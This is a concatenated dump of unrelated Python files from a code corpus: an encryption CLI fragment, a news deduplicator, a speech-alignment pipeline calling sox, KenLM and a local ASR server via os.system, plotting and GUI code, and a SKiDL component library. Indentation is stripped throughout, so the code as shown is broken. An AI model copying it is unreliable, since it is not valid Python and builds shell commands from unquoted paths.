plaintext = input("Enter the text you want to encrypt, hun: ").encode()
with open(f'{filename}-encrypted.txt', 'wb') as f:
f.write(encrypt(plaintext))
print(f'\n[*] Data has been encrypted and saved here: ./{filename}-encrypted.txt')
if args.decrypt:
file2decrypt = input("Enter the filename you want to decrypt: ")
try:
with open(file2decrypt, 'rb') as f:
contents = f.read()
print(decrypt(contents))
except FileNotFoundError as e:
print("[!] There is not a file with that name. Please check for typos.")
if args.mail:
email_helper()
if args.file:
file_helper()
if args.post:
post_helper()
| StarcoderdataPython |
5120380 | import datetime
from dateutil import parser
from sklearn.feature_extraction.text import TfidfVectorizer
from tap_news_utils.mongodb_client import MongoDBClient
from tap_news_utils.cloudAMQP_client import CloudAMQPClient
from tap_news_utils.news_classifier_client import NewsClassifierClient
from config import DEDUPE_NEWS_TASK_QUEUE_URL, DEDUPE_NEWS_TASK_QUEUE_NAME, MONGO_DB_HOST, MONGO_DB_PORT,NEWS_TOPIC_MODEL_HOST, NEWS_TOPIC_MODEL_PORT
COMP_NAME = 'news_deduper'
SLEEP_TIME_IN_SECONDS = 10
NEWS_TABLE_NAME = "news"
SAME_NEWS_SIMILARITY_THRESHOLD = 0.9
cloudAMQP_client = CloudAMQPClient(DEDUPE_NEWS_TASK_QUEUE_URL, DEDUPE_NEWS_TASK_QUEUE_NAME)
mongodb_client = MongoDBClient(MONGO_DB_HOST, MONGO_DB_PORT)
newsClassifier_client = NewsClassifierClient(NEWS_TOPIC_MODEL_HOST, NEWS_TOPIC_MODEL_PORT)
def handle_message(msg):
if not isinstance(msg, dict):
print (COMP_NAME, 'message is broken')
return
if 'text' not in msg:
print (COMP_NAME, 'message has no text')
return
text = msg['text']
if not text:
print (COMP_NAME, 'message text is empty')
return
published_at = parser.parse(msg['publishedAt'])
published_at_day_begin = datetime.datetime(published_at.year, published_at.month, published_at.day, 0, 0, 0, 0)
published_at_day_end = published_at_day_begin + datetime.timedelta(days=1)
db = mongodb_client.get_db()
same_day_news_list = list(db[NEWS_TABLE_NAME].find(
{'publishedAt': {'$gte':published_at_day_begin,
'$lt':published_at_day_end}}))
print (COMP_NAME, 'fetched %d today news ' % len(same_day_news_list))
if same_day_news_list and len(same_day_news_list) > 0:
documents = [news['text'] for news in same_day_news_list]
documents.insert(0, text)
tfidf = TfidfVectorizer().fit_transform(documents)
pairwise_sim = tfidf * tfidf.T
print (COMP_NAME, "Pairwise Sim: %s", str(pairwise_sim))
rows, _ = pairwise_sim.shape
for row in range(1, rows):
if pairwise_sim[row, 0] > SAME_NEWS_SIMILARITY_THRESHOLD:
print (COMP_NAME, "Duplicated news. Ignore.")
return
msg['publishedAt'] = parser.parse(msg['publishedAt'])
print (COMP_NAME, 'insert news into db')
msg['class'] = newsClassifier_client.classify(msg['text'])
db[NEWS_TABLE_NAME].replace_one({'digest':msg['digest']}, msg, upsert=True)
def run():
print (COMP_NAME, 'start to run')
while (True):
if cloudAMQP_client:
msg = cloudAMQP_client.getMessage()
if msg:
try:
handle_message(msg)
except Exception as e:
print ('ERROR', e)
pass
cloudAMQP_client.sleep(SLEEP_TIME_IN_SECONDS)
if __name__ == '__main__':
run()
| StarcoderdataPython |
1849799 | import sys
import os
import re
import argparse
from sox import file_info
import json
import Levenshtein
import subprocess
import time
import signal
# poor-man's norm
def norm(txtin):
# remove things in parentheses
txtout = re.sub(r'\([^\)]+\)','',txtin)
# remove tags
txtout = re.sub(r'FILLEDPAUSE\_','', txtout, flags=re.IGNORECASE)
txtout = re.sub(r'T\_[^\s+]+','', txtout, flags=re.IGNORECASE)
txtout = re.sub(r'E\_', '', txtout, flags=re.IGNORECASE)
# remove noise
txtout = re.sub(r'\&\S+(\s+|$)', ' ', txtout)
txtout = re.sub(r'\[\%\s+[^\%]+\]', ' ', txtout)
txtout = re.sub(r'(\s+|^)X+(\s+|$)', ' ', txtout)
txtout = re.sub(r'(\s+|^)x+(\s+|$)', ' ', txtout)
txtout = re.sub(r'\@\S+(\s+|$)', ' ', txtout) # @fp or @i ..
txtout = re.sub(r'\*[A-Z]+\:', ' ', txtout)
# convert uh to ah and uhm to um
txtout = re.sub(r'(\s+|^)uh(\s+|$)', ' ah ', txtout)
txtout = re.sub(r'(\s+|^)uhm(\s+|$)', ' um ', txtout)
txtout = re.sub(r'[\(|\[][^\(|\[]+[\)|\]]', '', txtout)
txtout = re.sub(r'[^a-zA-Z \']','',txtout)
txtout = re.sub(r'\s+', ' ', txtout)
return re.sub(r'\n',' ',txtout.upper())
def chunk_it(wavfile, strs, characters, options, basename, size):
# make chunks be around [size] seconds long - skip chunking if file is shorter than [size]
dur = file_info.duration(wavfile)
print("Duration: "+str(dur)+" Max size: "+str(size))
if dur <= size:
chunknum = 1
wavechunkout = options.output + "/" + basename + "_" + str(chunknum) + ".wav"
txtchunkout = open(options.output + "/" + basename + "_" + str(chunknum) + ".txt", "w")
txtchunkout.write(''.join(characters))
txtchunkout.close()
# print(basename+ " "+str(newstrs[i]) + " " + str(newstps[i]) + " " + str(length) + " " +str(chunknum))
os.system('sox ' + wavfile + ' ' + wavechunkout + ' channels 1 rate 16000')
#manifestfile.write(wavechunkout + "," + options.output + "/" + basename + "_" + str(chunknum) + ".txt\n")
return
newstrs = strs
newtexts = characters
#manifestfile = open(options.omanifest, "w")
chunknum = 1
chunktext = ""
nextchunkstart = 0
currlength = 0
for i in range(1, len(newstrs)):
segmentlength = newstrs[i] - newstrs[i-1]
currlength = newstrs[i]
if currlength - newstrs[nextchunkstart] >= size and segmentlength > 0.5 and characters[i-1] == " ": # > a silent pause included
# move back 100 ms from the start of the next word
splitpoint = newstrs[i] - 0.1
splitpointix = i # excluding i
#print(str(strs[i-1]) +" "+ str(strs[i]) +" "+ characters[i-1]+" "+ characters[i]+" "+ characters[i+1]+" "+ characters[i+2])
# write out to file
wavechunkout = options.output+"/"+basename+"_"+str(chunknum)+".wav"
txtchunkout = open(options.output + "/" + basename + "_" + str(chunknum) + ".txt","w")
txtchunkout.write(''.join(newtexts[nextchunkstart:splitpointix-1]))
txtchunkout.close()
audiochunklen = newstrs[splitpointix] - newstrs[nextchunkstart] - 0.1
#print(basename+ " "+str(newstrs[i]) + " " + str(newstps[i]) + " " + str(length) + " " +str(chunknum))
os.system('sox ' + wavfile + ' ' + wavechunkout + ' channels 1 rate 16000 trim ' + str(newstrs[nextchunkstart]) + ' ' + str(audiochunklen))
#manifestfile.write(wavechunkout + "," + options.output + "/" + basename + "_" + str(chunknum) + ".txt\n")
chunknum = chunknum+1
nextchunkstart = i
currlength = 0
# last chunk
# write out to file
wavechunkout = options.output + "/" + basename + "_" + str(chunknum) + ".wav"
txtchunkout = open(options.output + "/" + basename + "_" + str(chunknum) + ".txt", "w")
txtchunkout.write(''.join(newtexts[nextchunkstart:len(newstrs)]))
txtchunkout.close()
# print(basename+ " "+str(newstrs[i]) + " " + str(newstps[i]) + " " + str(length) + " " +str(chunknum))
os.system('sox ' + wavfile + ' ' + wavechunkout + ' channels 1 rate 16000 trim ' + str(newstrs[nextchunkstart]))
#manifestfile.write(wavechunkout + "," + options.output + "/" + basename + "_" + str(chunknum) + ".txt\n")
#manifestfile.close()
def align(wav, txt, wdir, basename, lm=None):
transcript_arr = None
offsets_arr = None
langmod = None
if lm == None:
# normalize text
txtin = open(txt,"r")
txtout = open(wdir+"/"+basename+".txt","w")
text = txtin.readline()
nrmtxt = norm(text)
txtout.write(nrmtxt+"\n")
txtout.close()
# build KenLM
#os.system("/home/pakh0002/kenlm/build/bin/lmplz -o 6 --discount_fallback --text " + wdir + "/" + basename + ".txt " + "--arpa "+ wdir + "/" + basename + ".arpa")
#os.system("/home/pakh0002/kenlm/build/bin/build_binary "+ wdir + "/" + basename + ".arpa " + wdir + "/" + basename + ".binary")
os.system("/workspace/kenlm/build/bin/lmplz -o 6 --discount_fallback --text " + wdir + "/" + basename + ".txt " + "--arpa " + wdir + "/" + basename + ".arpa")
os.system("/workspace/kenlm/build/bin/build_binary "+ wdir + "/" + basename + ".arpa " + wdir + "/" + basename + ".binary")
langmod = wdir + "/" + basename + ".binary"
else:
langmod = lm
# convert audio
os.system("sox "+wav+" -r 16000 -c 1 "+wdir + "/" + basename + "_16.wav" )
# run recognizer
print("Recognizing WAV... "+wav)
inwav = wdir + "/" + basename + "_16.wav"
outjson = wdir + "/" + basename + ".json"
os.system("curl -X POST http://0.0.0.0:8888/transcribe -H \"Content-type: multipart/form-data\" -F \"file=@"+wav+"\" > "+outjson)
#os.system("python ./transcribe.py --audio-path " +
# wdir + "/" + basename + "_16.wav --model-path /home/pakh0002/deepspeech.pytorch/expmodels/deepspeech_100g_cv.pth.tar --lm-path " +
# langmod + " --decoder beam --alpha 0.9 --cuda --offsets > " + wdir + "/" + basename + ".json");
# read JSON
with open(wdir + "/" + basename + ".json") as f:
asr_data = json.load(f)
transcript = asr_data["output"][0]["transcription"]
offsets_arr = asr_data["output"][0]["offsets"]
# take care of cases where the transcription is blank and no offsets
if transcript == "":
transcript = "\'"
offsets_arr.append(0)
transcript_arr = list(transcript)
assert len(offsets_arr) == len(transcript_arr), "Numbers of characters and offsets in output do not match"
# multiply the offsets by a scalar (duration of file in seconds / size of output) to get the offsets in seconds
dur = file_info.duration(wdir + "/" + basename + "_16.wav")
#coeff = float(dur) / 16000.0
offsets_arr_secs = [round(i * 0.02,2) for i in offsets_arr]
#print(len(offsets_arr))
#print(len(transcript_arr))
print("Result: " + transcript)
return [offsets_arr_secs,transcript_arr,wdir + "/" + basename + "_16.wav"]
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--imanifest', help='Input manifest', default='./')
parser.add_argument('--output', help='Output dir', default='./')
parser.add_argument('--omanifest', help='Output manifest', default = './out.txt')
parser.add_argument('--chunksize', help='Size of audio segments (seconds)', default=8.0)
parser.add_argument('--wdir', help='Working directory', default='./')
args = parser.parse_args()
inmani = open(args.imanifest,"r")
for line in inmani.readlines():
line = re.sub(r'\s+','',line)
wavefile,transcript = line.split(",")
if wavefile.endswith(".wav"):
basename = os.path.basename(wavefile)
dirname = os.path.dirname(wavefile)
basename = re.sub(r'\.wav', '', basename)
if os.path.isfile(wavefile) and os.path.isfile(transcript):
if file_info.duration(wavefile) > 20:
# split the long wavefile
os.system("sox -V3 "+wavefile+" "+dirname+"/"+basename+"_part_.wav silence -l 0 1 2.0 0.3\% : newfile : restart")
partcnt = 0
for part in os.listdir(dirname):
if "_part_" in part:
partcnt = partcnt + 1
if partcnt < 3:
os.system("rm -rf "+dirname+"/*_part_*")
# decrease silence dur to 1 second
os.system("sox -V3 " + wavefile + " " + dirname + "/" + basename + "_part_.wav silence -l 0 1 2.0 2\% : newfile : restart")
partcnt = 0
for part in os.listdir(dirname):
if "_part_" in part:
partcnt = partcnt + 1
if partcnt < 3:
os.system("rm -rf " + dirname + "/*_part_*")
# decrease silence dur to 1 second
os.system(
"sox -V3 " + wavefile + " " + dirname + "/" + basename + "_part_.wav silence -l 0 1 2.0 5\% : newfile : restart")
combined_wavs = {}
# build an LM
# normalize text
txtin = open(transcript, "r")
txtout = open(args.wdir + "/" + basename + ".txt", "w")
text = txtin.readline()
nrmtxt = norm(text)
txtout.write(nrmtxt + "\n")
txtout.close()
# build KenLM
os.system("/workspace/kenlm/build/bin/lmplz -o 6 --discount_fallback --text " + args.wdir + "/" + basename + ".txt " + "--arpa " + args.wdir + "/" + basename + ".arpa")
os.system("/workspace/kenlm/build/bin/build_binary " + args.wdir + "/" + basename + ".arpa " + args.wdir + "/" + basename + ".binary")
lmname = args.wdir + "/" + basename + ".binary"
# start the server
subproc = subprocess.Popen(['exec python server.py --model-path /home/pakh0002/deepspeech.pytorch/expmodels/deepspeech_100g_cv.pth.tar --lm-path ' + args.wdir + '/' + basename + '.binary --decoder beam --alpha 0.9 --cuda'], shell=True)
time.sleep(20)
pid = subproc.pid
print("Started ASR server process: "+str(pid))
#inwav = '/media/pakh0002/AUDIO_DATA_SSD/SWC_English/english/2006_Atlantic_hurricane_season/chunks/audio_part_001_1.wav'
#os.system("curl -X POST http://0.0.0.0:8888/transcribe -H \"Content-type: multipart/form-data\" -F \"file=@"+inwav+"\"")
for subname in os.listdir(dirname):
if "_part_" in subname:
partbasename = subname
partbasename = re.sub(r'\.wav','',partbasename)
starts, transcrs, wav = align(dirname+"/"+subname, transcript, args.wdir, partbasename, lmname)
chunk_it(wav, starts, transcrs, args, partbasename, float(args.chunksize))
#combined_wavs[wav] = [starts, transcrs]
#for wav in combined_wavs:
#print("WAVE to chunk: "+wav)
#chunk_it(wav, combined_wavs[wav][0], combined_wavs[wav][1], args, partbasename, float(args.chunksize))
#os.killpg(os.getpgid(pid), signal.SIGTERM)
subproc.kill()
print("Ended ASR server process: " + str(pid))
else:
# build an LM
# normalize text
txtin = open(transcript, "r")
txtout = open(args.wdir + "/" + basename + ".txt", "w")
text = txtin.readline()
nrmtxt = norm(text)
txtout.write(nrmtxt + "\n")
txtout.close()
# build KenLM
os.system("/workspace/kenlm/build/bin/lmplz -o 6 --discount_fallback --text " + args.wdir + "/" + basename + ".txt " + "--arpa " + args.wdir + "/" + basename + ".arpa")
os.system("/workspace/kenlm/build/bin/build_binary " + args.wdir + "/" + basename + ".arpa " + args.wdir + "/" + basename + ".binary")
lmname = args.wdir + "/" + basename + ".binary"
# start the server
subproc = subprocess.Popen(['exec python server.py --model-path /home/pakh0002/deepspeech.pytorch/expmodels/deepspeech_100g_cv.pth.tar --lm-path ' + args.wdir + '/' + basename + '.binary --decoder beam --alpha 0.9 --cuda'],shell=True)
time.sleep(20)
pid = subproc.pid
print("Started ASR server process: " + str(pid))
starts, transcrs, wav = align(wavefile, transcript, args.wdir, basename, lmname)
chunk_it(wav, starts, transcrs, args, basename, float(args.chunksize))
subproc.kill()
print("Ended ASR server process: " + str(pid))
continue
else:
continue
| StarcoderdataPython |
6546459 | # -*- coding: utf-8 -*-
"""
@author: <NAME>
"""
# Importations of the main packages and functions:
import numpy as np
import matplotlib.pyplot as plt
from functions import final_function, alpha_abrupt
# %%
# Representation of the variation of the interaction strength through time.
x = np.linspace(0, 59.9, 100)
N = 10
y_a = np.ones(100)
for i, value in enumerate(x):
y_a[i] = alpha_abrupt(value)
fig = plt.figure(1, figsize=(10, 6))
plt.plot(x, y_a, color='k')
plt.axhline(np.sqrt(2*np.log(10)), color='black',
linestyle='--', label='Feasibility threshold')
plt.ylim(0, 3.5)
axes = plt.gca()
axes.yaxis.set_ticks([0, 0.5, 1, 1.5, 2, np.sqrt(2*np.log(10)), 2.5, 3, 3.5])
axes.yaxis.set_ticklabels(('0', '0.5', '1', '1.5', '2',
r'$\sqrt{2log(10)}$', '2.5', '3', '3.5'), color='black', fontsize=10)
plt.xlabel("Time (t)", fontsize=15)
plt.ylabel(r"Variation of the interaction strength $\alpha(t)$", fontsize=15)
plt.legend(loc='upper right')
plt.show()
# %%
# Representation of the proportion of surviving species through time.
x = np.linspace(0, 59.9, 100)
N = 10
p_a = np.ones(100)
y_a = np.ones(100)
MU = 0
for i, value in enumerate(x):
p_a[i] = final_function(alpha_abrupt(value), MU)[0]
fig = plt.figure(1, figsize=(10, 6))
plt.plot(x, p_a, color='k', linestyle='--')
plt.ylim(0, 1.1)
plt.xlabel("Time (t)", fontsize=15)
plt.ylabel(r"Variation of the proportion of surviving species $p(t)$", fontsize=15)
plt.show()
| StarcoderdataPython |
5057334 | <filename>ibeatles/step2/gui_handler.py
try:
import PyQt4
import PyQt4.QtCore as QtCore
import PyQt4.QtGui as QtGui
except:
import PyQt5
import PyQt5.QtCore as QtCore
import PyQt5.QtGui as QtGui
import numpy as np
import pyqtgraph as pg
from pyqtgraph.dockarea import *
from ibeatles.utilities.colors import pen_color
from ibeatles.step2.plot import Step2Plot
from ibeatles.step2.normalization import Normalization
class CustomAxis(pg.AxisItem):
def tickStrings(self, values, scale, spacing):
values[values == 0] = np.NaN #remove 0 before division
return ['{:.4f}'.format(1./i) for i in values]
class Step2GuiHandler(object):
col_width = [70, 50, 50, 50, 50]
def __init__(self, parent=None):
self.parent = parent
def update_widgets(self):
o_step2_plot = Step2Plot(parent = self.parent)
o_step2_plot.display_image()
#o_step2_plot.display_counts_vs_file()
o_normalization = Normalization(parent=self.parent)
o_normalization.run()
o_step2_plot.init_roi_table()
self.check_run_normalization_button()
def init_table(self):
for _index, _width in enumerate(self.col_width):
self.parent.ui.normalization_tableWidget.setColumnWidth(_index, _width)
def init_pyqtgraph(self):
area = DockArea()
area.setVisible(False)
d1 = Dock("Sample", size=(200, 300))
d2 = Dock("STEP1: Background normalization", size=(200, 100))
#d3 = Dock("STEP2: Working Range Selection", size=(200, 100))
area.addDock(d1, 'top')
#area.addDock(d3, 'bottom')
area.addDock(d2, 'bottom')
#area.moveDock(d2, 'above', d3)
preview_widget = pg.GraphicsLayoutWidget()
pg.setConfigOptions(antialias=True)
vertical_layout = QtGui.QVBoxLayout()
#preview_widget.setLayout(vertical_layout)
# image view
image_view = pg.ImageView()
image_view.ui.roiBtn.hide()
image_view.ui.menuBtn.hide()
roi = pg.ROI([0,0],[20,20], pen=pen_color['0'])
roi.addScaleHandle([1,1],[0,0])
image_view.addItem(roi)
roi.sigRegionChangeFinished.connect(self.parent.normalization_manual_roi_changed)
#vertical_layout.addWidget(image_view)
#top_right_widget = QtGui.QWidget()
d1.addWidget(image_view)
# bragg edge plot
bragg_edge_plot = pg.PlotWidget()
bragg_edge_plot.plot()
# bragg_edge_plot.setLabel("top", "")
p1 = bragg_edge_plot.plotItem
p1.layout.removeItem(p1.getAxis('top'))
caxis = CustomAxis(orientation='top', parent=p1)
caxis.setLabel('')
caxis.linkToView(p1.vb)
p1.layout.addItem(caxis, 1, 1)
#add file_index, TOF, Lambda x-axis buttons
hori_layout = QtGui.QHBoxLayout()
button_widgets = QtGui.QWidget()
button_widgets.setLayout(hori_layout)
#file index
file_index_button = QtGui.QRadioButton()
file_index_button.setText("File Index")
file_index_button.setChecked(True)
self.parent.connect(file_index_button, QtCore.SIGNAL("clicked()"),
self.parent.step2_file_index_radio_button_clicked)
#tof
tof_button = QtGui.QRadioButton()
tof_button.setText("TOF")
self.parent.connect(tof_button, QtCore.SIGNAL("clicked()"),
self.parent.step2_tof_radio_button_clicked)
#lambda
lambda_button = QtGui.QRadioButton()
lambda_button.setText(u"\u03BB")
self.parent.connect(lambda_button, QtCore.SIGNAL("clicked()"),
self.parent.step2_lambda_radio_button_clicked)
spacer = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
hori_layout.addItem(spacer)
hori_layout.addWidget(file_index_button)
hori_layout.addWidget(tof_button)
hori_layout.addWidget(lambda_button)
hori_layout.addItem(spacer)
d2.addWidget(bragg_edge_plot)
d2.addWidget(button_widgets)
vertical_layout.addWidget(area)
self.parent.ui.normalization_left_widget.setLayout(vertical_layout)
self.parent.step2_ui['area'] = area
self.parent.step2_ui['image_view'] = image_view
self.parent.list_roi_id['normalization'] = [roi]
self.parent.step2_ui['bragg_edge_plot'] = bragg_edge_plot
#self.parent.step2_ui['normalized_profile_plot'] = normalized_profile_plot
self.parent.step2_ui['caxis'] = caxis
self.parent.step2_ui['xaxis_file_index'] = file_index_button
self.parent.step2_ui['xaxis_lambda'] = lambda_button
self.parent.step2_ui['xaxis_tof'] = tof_button
self.parent.xaxis_button_ui['normalization']['tof'] = tof_button
self.parent.xaxis_button_ui['normalization']['file_index'] = file_index_button
self.parent.xaxis_button_ui['normalization']['lambda'] = lambda_button
def check_add_remove_roi_buttons(self):
nbr_row = self.parent.ui.normalization_tableWidget.rowCount()
if nbr_row == 0:
_status_remove = False
else:
_status_remove = True
self.parent.ui.normalization_remove_roi_button.setEnabled(_status_remove)
def check_run_normalization_button(self):
nbr_row = self.parent.ui.normalization_tableWidget.rowCount()
ob = self.parent.data_files['ob']
data = self.parent.data_files['sample']
if data == []:
_status = False
else:
if (nbr_row == 0) and (ob == []):
_status = False
else:
_status = True
self.parent.ui.normalization_button.setEnabled(_status)
def enable_xaxis_button(self, tof_flag=True):
list_ui = [self.parent.step2_ui['xaxis_file_index'],
self.parent.step2_ui['xaxis_lambda'],
self.parent.step2_ui['xaxis_tof']]
if tof_flag:
for _ui in list_ui:
_ui.setEnabled(True)
else:
list_ui[1].setEnabled(False)
list_ui[2].setEnabled(False)
list_ui[0].setChecked(True) | StarcoderdataPython |
3482021 | <reponame>arjenroodselaar/skidl
from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
SKIDL_lib_version = '0.0.1'
references = SchLib(tool=SKIDL).add_parts(*[
Part(name='CJ432',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-23',ref_prefix='D',num_units=1,fplist=['SOT*23*'],do_erc=True,pins=[
Pin(num='1',name='REF',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
Part(name='ISL21070DIH306Z-TK',dest=TEMPLATE,tool=SKIDL,keywords='Micropower Voltage Reference 0.6V',description='ISL201070 Series, 0.6V 25μA Micropower Voltage Reference, SOT-23',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['ISL21070CIH320Z-TK', 'ISL21070CIH325Z-TK'],pins=[
Pin(num='1',name='Vin',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='Vout',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='LM134H/NOPB',dest=TEMPLATE,tool=SKIDL,keywords='Adjustable Current Source 10mA',description='LM134H, 1μA to 10mA 3-Terminal Adjustable Current Source, TO-46',ref_prefix='U',num_units=1,fplist=['TO?46*'],do_erc=True,pins=[
Pin(num='1',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='~',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM285D-1.2',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference',description='2.500V Micropower Voltage Reference Diodes, SO-8',ref_prefix='D',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['LM285D-2.5', 'LM385D-1.2', 'LM385D-2.5'],pins=[
Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='4',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='6',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='8',name='K',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM285M-ADJ',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference',description='Adjustable Micropower Voltage Reference Diodes, SO-8',ref_prefix='D',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['LM385M-ADJ'],pins=[
Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='4',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='FB',do_erc=True),
Pin(num='6',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='8',name='K',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM285S-1.2',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference',description='2.500V Micropower Voltage Reference Diodes, SO-8',ref_prefix='D',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['LM385S-1.2', 'LM285S-2.5', 'LM385S-2.5'],pins=[
Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='4',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='6',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='8',name='K',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM285Z-2.5',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference',description='1.235V Micropower Voltage Reference Diodes, TO-92',ref_prefix='D',num_units=1,fplist=['TO?92*'],do_erc=True,aliases=['LM285Z-1.2', 'LM385Z-1.2', 'LM358Z-2.5', 'LM385BZ-2.5', 'LM385BZ-1.2'],pins=[
Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM285Z-ADJ',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference',description='Adjustable Micropower Voltage Reference Diodes, TO-92',ref_prefix='D',num_units=1,fplist=['TO?92*'],do_erc=True,aliases=['LM385Z-ADJ'],pins=[
Pin(num='1',name='FB',do_erc=True),
Pin(num='2',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM334M/NOPB',dest=TEMPLATE,tool=SKIDL,keywords='Adjustable Current Source 10mA',description='LM334M, 1μA to 10mA 3-Terminal Adjustable Current Source, SO-8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='6',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='~',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM334SM/NOPB',dest=TEMPLATE,tool=SKIDL,keywords='Adjustable Current Source 10mA',description='LM334SM, 1μA to 10mA 3-Terminal Adjustable Current Source, SO-8 Alternate',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='~',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM334Z/NOPB',dest=TEMPLATE,tool=SKIDL,keywords='Adjustable Current Source 10mA',description='LM334Z, 1μA to 10mA 3-Terminal Adjustable Current Source, TO-92',ref_prefix='U',num_units=1,fplist=['TO?92*'],do_erc=True,aliases=['LM334Z/LFT1', 'LM234Z-3/NOPB', 'LM234Z-6/NOPB'],pins=[
Pin(num='1',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='~',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='~',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM4030-4.096',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference shunt',description='4.096V Ultra-High Precision Shunt Voltage Reference, SOT-23-5',ref_prefix='D',num_units=1,fplist=['SOT?23*'],do_erc=True,aliases=['LM4030-2.5'],pins=[
Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='NC_GND',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='4',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='A',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM4040DBZ-2.0',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference shunt',description='8.192V Precision Micropower Shunt Voltage Reference, SOT-23',ref_prefix='D',num_units=1,fplist=['SOT?*23'],do_erc=True,aliases=['LM4040DBZ-2.5', 'LM4040DBZ-3', 'LM4040DBZ-4.1', 'LM4040DBZ-5', 'LM4040DBZ-8.2', 'LM4040DBZ-10'],pins=[
Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True)]),
Part(name='LM4040DCK-2.0',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference shunt',description='8.192V Precision Micropower Shunt Voltage Reference, SC-70',ref_prefix='D',num_units=1,fplist=['SC?70*'],do_erc=True,aliases=['LM4040DCK-2.5', 'LM4040DCK-3', 'LM4040DCK-4.1', 'LM4040DCK-5', 'LM4040DCK-8.2', 'LM4040DCK-10'],pins=[
Pin(num='1',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='5',name='NC',func=Pin.NOCONNECT,do_erc=True)]),
